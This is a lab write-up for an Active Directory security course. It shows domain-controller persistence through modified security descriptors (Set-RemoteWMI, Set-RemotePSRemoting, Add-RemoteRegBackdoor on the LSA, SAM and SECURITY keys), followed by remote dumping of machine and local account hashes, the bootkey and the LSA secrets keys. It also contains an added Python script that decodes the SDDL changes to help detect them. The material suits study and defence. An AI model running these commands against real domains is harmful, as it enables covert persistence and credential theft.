Learning Objective - 13

Security Descriptors

Set-RemoteWMI

We run gwmi to check whether we have permission to run WMI queries on the DC.

PS C:\ad\tools> gwmi -class win32_operatingsystem -ComputerName dcorp-dc
gwmi : Access is denied.
At line:1 char:1
+ gwmi -class win32_operatingsystem -ComputerName dcorp-dc
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Get-WmiObject], UnauthorizedAccessException
    + FullyQualifiedErrorId : System.UnauthorizedAccessException,Microsoft.PowerShell.Commands.GetWmiObjectCommand

Now we add the ACL entry for student723 with Set-RemoteWMI.

PS C:\ad\Tools> Set-RemoteWMI -SamAccountName student723 -ComputerName dcorp-dc -verbose
VERBOSE: Existing ACL for namespace root is
O:BAG:BAD:(A;CI;CCDCLCSWRPWPRCWD;;;BA)(A;CI;CCDCRP;;;NS)(A;CI;CCDCRP;;;LS)(A;CI;CCDCRP;;;AU)
VERBOSE: Existing ACL for DCOM is
O:BAG:BAD:(A;;CCDCLCSWRP;;;BA)(A;;CCDCSW;;;WD)(A;;CCDCLCSWRP;;;S-1-5-32-562)(A;;CCDCLCSWRP;;;LU)(A;;CCDCSW;;;AC)(A;;CCDCSW;;;S-1-15-3-1024-2405443489-874036122-4286035555-1823921565-1746547431-2453885448-3625952902-991631256)
VERBOSE: New ACL for namespace root is
O:BAG:BAD:(A;CI;CCDCLCSWRPWPRCWD;;;BA)(A;CI;CCDCRP;;;NS)(A;CI;CCDCRP;;;LS)(A;CI;CCDCRP;;;AU)(A;CI;CCDCLCSWRPWPRCWD;;;S-1-5-21-719815819-3726368948-3917688648-13603)
VERBOSE: New ACL for DCOM
O:BAG:BAD:(A;;CCDCLCSWRP;;;BA)(A;;CCDCSW;;;WD)(A;;CCDCLCSWRP;;;S-1-5-32-562)(A;;CCDCLCSWRP;;;LU)(A;;CCDCSW;;;AC)(A;;CCDCSW;;;S-1-15-3-1024-2405443489-874036122-4286035555-1823921565-1746547431-2453885448-3625952902-991631256)(A;;CCDCLCSWRP;;;S-1-5-21-719815819-3726368948-3917688648-13603)

Then we run the query again.

PS C:\ad\tools> gwmi -class win32_operatingsystem -ComputerName dcorp-dc


SystemDirectory : C:\Windows\system32
Organization    :
BuildNumber     : 20348
RegisteredUser  : Windows User
SerialNumber    : 00454-30000-00000-AA745
Version         : 10.0.20348

Set-RemotePSRemoting

We try to get a shell using Enter-PSSession.

PS C:\ad\tools> Enter-PSSession -ComputerName dcorp-dc -Credential dcorp\student723
Enter-PSSession : Connecting to remote server dcorp-dc failed with the following error message : Access is denied. For
more information, see the about_Remote_Troubleshooting Help topic.
At line:1 char:1
+ Enter-PSSession -ComputerName dcorp-dc -Credential dcorp\student723
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidArgument: (dcorp-dc:String) [Enter-PSSession], PSRemotingTransportException
    + FullyQualifiedErrorId : CreateRemoteRunspaceFailed

Now we add the ACL entry for student723 with Set-RemotePSRemoting.

PS C:\ad\Tools> Set-RemotePSRemoting -SamAccountName student723 -ComputerName dcorp-dc -Verbose
[dcorp-dc] Processing data from remote server dcorp-dc failed with the following error message: The I/O operation has
been aborted because of either a thread exit or an application request. For more information, see the
about_Remote_Troubleshooting Help topic.
    + CategoryInfo          : OpenError: (dcorp-dc:String) [], PSRemotingTransportException
    + FullyQualifiedErrorId : WinRMOperationAborted,PSSessionStateBroken

Ignore the error and try to get the remote PowerShell session again.

PS C:\ad\tools> Enter-PSSession -ComputerName dcorp-dc -Credential dcorp\student723
[dcorp-dc]: PS C:\Users\student723\Documents> whoami
dcorp\student723
[dcorp-dc]: PS C:\Users\student723\Documents>

And it worked :D.

Add-RemoteRegBackdoor

We add ACL entries on the registry keys so that we can extract information later:

PS C:\ad\Tools> Add-RemoteRegBackdoor -ComputerName dcorp-dc -Trustee student723 -Verbose
VERBOSE: [dcorp-dc : ] Using trustee username 'student723'
VERBOSE: [dcorp-dc] Remote registry is not running, attempting to start
VERBOSE: [dcorp-dc] Attaching to remote registry through StdRegProv
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Backdooring started for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Creating ACE with Access Mask of 983103
 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Creating the trustee WMI object with
user 'student723'
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Applying Trustee to new Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Calling SetSecurityDescriptor on the
key with the newly created Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Backdooring completed for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Backdooring started for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and
AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Creating the trustee WMI object with user 'student723'
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Applying Trustee to new Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Calling SetSecurityDescriptor on the key with the newly
created Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Backdooring completed for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Backdooring started for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Creating ACE with Access Mask of 983103 (ALL_ACCESS)
and AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Creating the trustee WMI object with user 'student723'
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Applying Trustee to new Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Calling SetSecurityDescriptor on the key with the
newly created Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Backdooring completed for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Data] Backdooring started for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Data] Creating ACE with Access Mask of 983103 (ALL_ACCESS)
and AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Data] Creating the trustee WMI object with user 'student723'
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Data] Applying Trustee to new Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Data] Calling SetSecurityDescriptor on the key with the newly
 created Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Data] Backdooring completed for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Backdooring started for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and
 AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Creating the trustee WMI object with user 'student723'
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Applying Trustee to new Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Calling SetSecurityDescriptor on the key with the newly
created Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Backdooring completed for key
VERBOSE: [dcorp-dc : SECURITY] Backdooring started for key
VERBOSE: [dcorp-dc : SECURITY] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2
(CONTAINER_INHERIT_ACE)
VERBOSE: [dcorp-dc : SECURITY] Creating the trustee WMI object with user 'student723'
VERBOSE: [dcorp-dc : SECURITY] Applying Trustee to new Ace
VERBOSE: [dcorp-dc : SECURITY] Calling SetSecurityDescriptor on the key with the newly created Ace
VERBOSE: [dcorp-dc : SECURITY] Backdooring completed for key
VERBOSE: [dcorp-dc : SAM\SAM\Domains\Account] Backdooring started for key
VERBOSE: [dcorp-dc : SAM\SAM\Domains\Account] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2
(CONTAINER_INHERIT_ACE)
VERBOSE: [dcorp-dc : SAM\SAM\Domains\Account] Creating the trustee WMI object with user 'student723'
VERBOSE: [dcorp-dc : SAM\SAM\Domains\Account] Applying Trustee to new Ace
The property 'DACL' cannot be found on this object. Verify that the property exists and can be set.
At C:\ad\Tools\RACE.ps1:2268 char:13
+             $RegSD.DACL += $RegAce.PSObject.ImmediateBaseObject
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : PropertyNotFound

VERBOSE: [dcorp-dc : SAM\SAM\Domains\Account] Calling SetSecurityDescriptor on the key with the newly created Ace
VERBOSE: [dcorp-dc : SAM\SAM\Domains\Account] Backdooring completed for key
VERBOSE: [dcorp-dc] Backdooring completed for system

ComputerName BackdoorTrustee
------------ ---------------
dcorp-dc     student723
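To make the SDDL strings printed by Set-RemoteWMI above and the access mask that Add-RemoteRegBackdoor reports (983103, AceFlags 2) readable, here is an added Python example; it is not part of RACE.ps1 or of this lab. It parses the DACL of an SDDL string, diffs the "existing" and "new" descriptors to surface the ACE that was added, and decodes the mask with the rights table of the object it belongs to (WMI namespace, DCOM permission, registry key). The sample inputs are the descriptors shown above, re-joined where the console wrapped them; the rights tables are the standard SDDL letter codes and the documented WMI namespace, COM and registry key bit values. Run against a baseline export, the same diff is a quick check for account-specific ACEs that a DC's root namespace does not normally carry.

```python
"""Decode the SDDL DACLs printed by Set-RemoteWMI and the registry ACE mask
reported by Add-RemoteRegBackdoor. Added example built around the strings on
this page; it is not part of RACE.ps1."""
import re
from collections import namedtuple

Ace = namedtuple("Ace", "type flags mask sid")

# Generic SDDL rights letters -> access-mask bits (SDDL specification).
RIGHTS_BITS = {"CC": 0x1, "DC": 0x2, "LC": 0x4, "SW": 0x8, "RP": 0x10, "WP": 0x20,
               "DT": 0x40, "LO": 0x80, "CR": 0x100, "SD": 0x10000, "RC": 0x20000,
               "WD": 0x40000, "WO": 0x80000}
# The same bit positions mean different things per object type.
WMI_RIGHTS = {0x1: "WBEM_ENABLE", 0x2: "WBEM_METHOD_EXECUTE", 0x4: "WBEM_FULL_WRITE_REP",
              0x8: "WBEM_PARTIAL_WRITE_REP", 0x10: "WBEM_WRITE_PROVIDER",
              0x20: "WBEM_REMOTE_ACCESS", 0x40: "WBEM_RIGHT_SUBSCRIBE",
              0x80: "WBEM_RIGHT_PUBLISH", 0x20000: "READ_CONTROL", 0x40000: "WRITE_DAC"}
DCOM_RIGHTS = {0x1: "COM_RIGHTS_EXECUTE", 0x2: "COM_RIGHTS_EXECUTE_LOCAL",
               0x4: "COM_RIGHTS_EXECUTE_REMOTE", 0x8: "COM_RIGHTS_ACTIVATE_LOCAL",
               0x10: "COM_RIGHTS_ACTIVATE_REMOTE"}
REG_RIGHTS = {0x1: "KEY_QUERY_VALUE", 0x2: "KEY_SET_VALUE", 0x4: "KEY_CREATE_SUB_KEY",
              0x8: "KEY_ENUMERATE_SUB_KEYS", 0x10: "KEY_NOTIFY", 0x20: "KEY_CREATE_LINK",
              0x10000: "DELETE", 0x20000: "READ_CONTROL", 0x40000: "WRITE_DAC",
              0x80000: "WRITE_OWNER"}

DACL_RE = re.compile(r"D:[A-Z]*((?:\([^)]*\))+)")   # "D:" + optional flags + ACEs
ACE_RE = re.compile(r"\(([^)]*)\)")


def rights_mask(field):
    """Convert an SDDL rights field (two-letter codes or a hex number) to an int."""
    if field.lower().startswith("0x"):
        return int(field, 16)
    return sum(RIGHTS_BITS[field[i:i + 2]] for i in range(0, len(field), 2))


def parse_dacl(sddl):
    """Return the DACL of an SDDL string as a list of Ace tuples (empty if none)."""
    m = DACL_RE.search(sddl)
    if not m:
        return []
    aces = []
    for body in ACE_RE.findall(m.group(1)):
        parts = body.split(";")
        if len(parts) < 6:          # conditional/object ACEs with extra fields are skipped
            continue
        ace_type, flags, rights, _obj, _inh_obj, sid = parts[:6]
        aces.append(Ace(ace_type, tuple(flags[i:i + 2] for i in range(0, len(flags), 2)),
                        rights_mask(rights), sid))
    return aces


def decode(mask, table):
    """Names of the rights in `table` that are set in `mask`, lowest bit first."""
    return [name for bit, name in sorted(table.items()) if mask & bit]


def added_aces(before, after):
    """ACEs present in `after` but absent from `before` (order-insensitive)."""
    old = set(parse_dacl(before))
    return [a for a in parse_dacl(after) if a not in old]


def account_specific_aces(sddl):
    """Allow ACEs whose trustee is an account or group SID (S-1-5-21-...) rather than
    a well-known principal. The default root-namespace DACL has none, so any hit on
    a DC deserves an explanation."""
    return [a for a in parse_dacl(sddl) if a.type == "A" and a.sid.startswith("S-1-5-21-")]


# Sample input: the before/after descriptors printed by Set-RemoteWMI above.
ROOT_BEFORE = ("O:BAG:BAD:(A;CI;CCDCLCSWRPWPRCWD;;;BA)(A;CI;CCDCRP;;;NS)"
               "(A;CI;CCDCRP;;;LS)(A;CI;CCDCRP;;;AU)")
ROOT_AFTER = ROOT_BEFORE + "(A;CI;CCDCLCSWRPWPRCWD;;;S-1-5-21-719815819-3726368948-3917688648-13603)"
DCOM_BEFORE = ("O:BAG:BAD:(A;;CCDCLCSWRP;;;BA)(A;;CCDCSW;;;WD)(A;;CCDCLCSWRP;;;S-1-5-32-562)"
               "(A;;CCDCLCSWRP;;;LU)(A;;CCDCSW;;;AC)(A;;CCDCSW;;;S-1-15-3-1024-2405443489-874036122-"
               "4286035555-1823921565-1746547431-2453885448-3625952902-991631256)")
DCOM_AFTER = DCOM_BEFORE + "(A;;CCDCLCSWRP;;;S-1-5-21-719815819-3726368948-3917688648-13603)"

if __name__ == "__main__":
    for label, before, after, table in (("root namespace", ROOT_BEFORE, ROOT_AFTER, WMI_RIGHTS),
                                        ("DCOM", DCOM_BEFORE, DCOM_AFTER, DCOM_RIGHTS)):
        for ace in added_aces(before, after):
            print(f"{label}: new ACE for {ace.sid} flags={ace.flags} "
                  f"rights={decode(ace.mask, table)}")
    # Add-RemoteRegBackdoor reports mask 983103 and AceFlags 2 on every key it touches.
    print("registry ACE 983103 ->", decode(983103, REG_RIGHTS))
```

Run as a script it prints the single new ACE in each descriptor: on the root namespace the student SID gets the same rights as Builtin\Administrators, including WBEM_REMOTE_ACCESS and WRITE_DAC, with CI so it inherits down to every sub-namespace; on the DCOM descriptor it gets all five launch and activation rights; and 983103 is KEY_ALL_ACCESS, with WRITE_DAC and WRITE_OWNER, on each of the LSA, SECURITY and SAM keys listed in the verbose output. `account_specific_aces` is the check to run against a live export, since the default root namespace DACL names only well-known principals (BA, NS, LS, AU).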

Now we can extract information such as:

The machine account hash:

PS C:\AD\Tools> . .\RACE.ps1
PS C:\AD\Tools> Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose
VERBOSE: Bootkey/SysKey : BAB78ACD91795C983AEF0534E0DB38C7
VERBOSE: LSA Key        : BDC807FEC0BB38EB0AE338451573904220F8B69404F719BDDB03F8618E84005C

ComputerName MachineAccountHash
------------ ------------------
dcorp-dc     ef7a661f7edb7f5a1be191640342d6b7

The local account hashes:

PS C:\AD\Tools> Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose
VERBOSE: Bootkey/SysKey : BAB78ACD91795C983AEF0534E0DB38C7
VERBOSE: HBootKey : 3A7C1B66C61B8E967267FA0CB9D560265774BB4ACA899D52D1DC5ADD11C20C19


ComputerName : dcorp-dc
UserName     : Administrator
UserRID      : 500
UserLMHash   : f618da2acca75dbd3afd9486927b2f05
UserNTLMHash : 24275a16f48a1ad2580f4146ba1d192c

ComputerName : dcorp-dc
UserName     : Guest
UserRID      : 501
UserLMHash   : c09e6e3be671fbc51afb1722e5777af5
UserNTLMHash : f269747c02eebd676a1e8221ad80bc74

ComputerName : dcorp-dc
UserName     : DefaultAccount
UserRID      : 503
UserLMHash   : 61b3c0708bd8d8dc4be7dba6056eb71e
UserNTLMHash : 8f049f1b7806434b7cdf2821a375eec8

ComputerName : dcorp-dc
UserName     : WDAGUtilityAccount
UserRID      : 504
UserLMHash   : aad3b435b51404eeaad3b435b51404ee
UserNTLMHash : 31d6cfe0d16ae931b73c59d7e0c089c0

The domain cached credentials:

PS C:\AD\Tools> Get-RemoteCachedCredential -ComputerName dcorp-dc -Verbose
VERBOSE: Bootkey/SysKey : BAB78ACD91795C983AEF0534E0DB38C7
VERBOSE: LSA Key        : BDC807FEC0BB38EB0AE338451573904220F8B69404F719BDDB03F8618E84005C
VERBOSE: NL$KM Key     : 21 55 A8 F7 64 DD 9A FA 80 95 0F 03 E8 E4 76 5E 11 34 99 56 DE 62 E1 00 C6 FD 7D B8 14 AF 4F
73 58 C1 68 E3 16 E2 04 98 93 A5 39 C6 1B 7A E4 19 FE E6 EF DC 73 64 72 8C F9 2A F2 5C 68 D2 DB 73
